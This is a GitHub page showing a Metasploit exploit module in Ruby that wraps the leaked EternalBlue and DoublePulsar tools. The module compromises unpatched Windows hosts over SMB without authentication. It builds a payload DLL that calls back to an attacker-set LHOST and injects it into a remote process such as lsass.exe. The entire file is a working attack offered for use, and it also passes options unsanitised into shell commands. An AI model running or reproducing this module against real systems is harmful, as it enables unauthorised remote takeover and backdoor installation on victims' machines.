-
Notifications
You must be signed in to change notification settings - Fork 518
/
eternalblue_doublepulsar.rb
executable file
·131 lines (109 loc) · 5.14 KB
/
eternalblue_doublepulsar.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
#include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'EternalBlue',
'Description' => %q{
This module exploits a vulnerability on SMBv1/SMBv2 protocols through Eternalblue.
After that, doublepulsar is used to inject remotely a malicious dll (it's will generate based on your payload selection).
You can use this module to compromise a host remotely (among the targets available) without needing nor authentication neither target's user interaction.
** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, IT'S NOT THE FULL PORTATION **
},
'Author' =>
[
'Pablo Gonzalez (@pablogonzalezpe)',
'Sheila A. Berta (@UnaPibaGeek)'
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'DefaultTarget' => 8,
'Targets' =>
[
['Windows XP (all services pack) (x86) (x64)',{}],
['Windows Server 2003 SP0 (x86)',{}],
['Windows Server 2003 SP1/SP2 (x86)',{}],
['Windows Server 2003 (x64)',{}],
['Windows Vista (x86)',{}],
['Windows Vista (x64)',{}],
['Windows Server 2008 (x86) ',{}],
['Windows Server 2008 R2 (x86) (x64)',{}],
['Windows 7 (all services pack) (x86) (x64)',{}]
],
'Arch' => [ARCH_X86,ARCH_X64],
'ExitFunc' => 'thread',
'Target' => 0,
'License' => MSF_LICENSE,
)
)
register_options([
OptEnum.new('TARGETARCHITECTURE', [true,'Target Architecture','x86',['x86','x64']]),
OptString.new('ETERNALBLUEPATH',[true,'Path directory of Eternalblue','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
OptString.new('DOUBLEPULSARPATH',[true,'Path directory of Doublepulsar','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
OptString.new('WINEPATH',[true,'WINE drive_c path','/root/.wine/drive_c/']),
OptString.new('PROCESSINJECT',[true,'Name of process to inject into (Change to lsass.exe for x64)','wlms.exe'])
], self.class)
register_advanced_options([
OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',60]),
OptString.new('DLLName',[true,'DLL name for Doublepulsar','eternal11.dll'])
], self.class)
end
def exploit
#Custom XML Eternalblue
print_status('Generating Eternalblue XML data')
cp = `cp #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.Skeleton.xml #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
#WIN72K8R2 (4-8) and XP (0-3)
if target.name =~ /7|2008|Vista/
objective = "WIN72K8R2"
else
objective = "XP"
end
sed = `sed -i 's/%TARGET%/#{objective}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
#Custom XML Doublepulsar
print_status('Generating Doublepulsar XML data')
cp = `cp #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.Skeleton.xml #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%TARGETARCHITECTURE%/#{datastore['TARGETARCHITECTURE']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
dllpayload = datastore['WINEPATH'] + datastore['DLLName']
dllpayload2 = dllpayload.gsub('/','\/')
sed = `sed -i 's/%DLLPAY%/#{dllpayload2}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%PROCESSINJECT%/#{datastore['PROCESSINJECT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
#Generate DLL
print_status("Generating payload DLL for Doublepulsar")
pay = framework.modules.create(datastore['payload'])
pay.datastore['LHOST'] = datastore['LHOST']
pay.datastore['LPORT'] = datastore['LPORT']
dll = pay.generate_simple({'Format'=>'dll'})
File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
print_status("Writing DLL in #{dllpayload}")
f.print dll
end
#Send Exploit + Payload Injection
print_status('Launching Eternalblue...')
output = `cd #{datastore['ETERNALBLUEPATH']}; wine Eternalblue-2.2.0.exe`
if output =~ /=-=-WIN-=-=/
print_good("Pwned! Eternalblue success!")
elsif output =~ /Backdoor returned code: 10 - Success!/
print_good("Backdoor is already installed")
else
print_error("Are you sure it's vulnerable?")
end
print_status('Launching Doublepulsar...')
output2 = `cd #{datastore['DOUBLEPULSARPATH']}; wine Doublepulsar-1.3.1.exe`
if output2 =~ /Backdoor returned code: 10 - Success!/
print_good("Remote code executed... 3... 2... 1...")
else
print_error("Oops, something was wrong!")
end
handler
end
end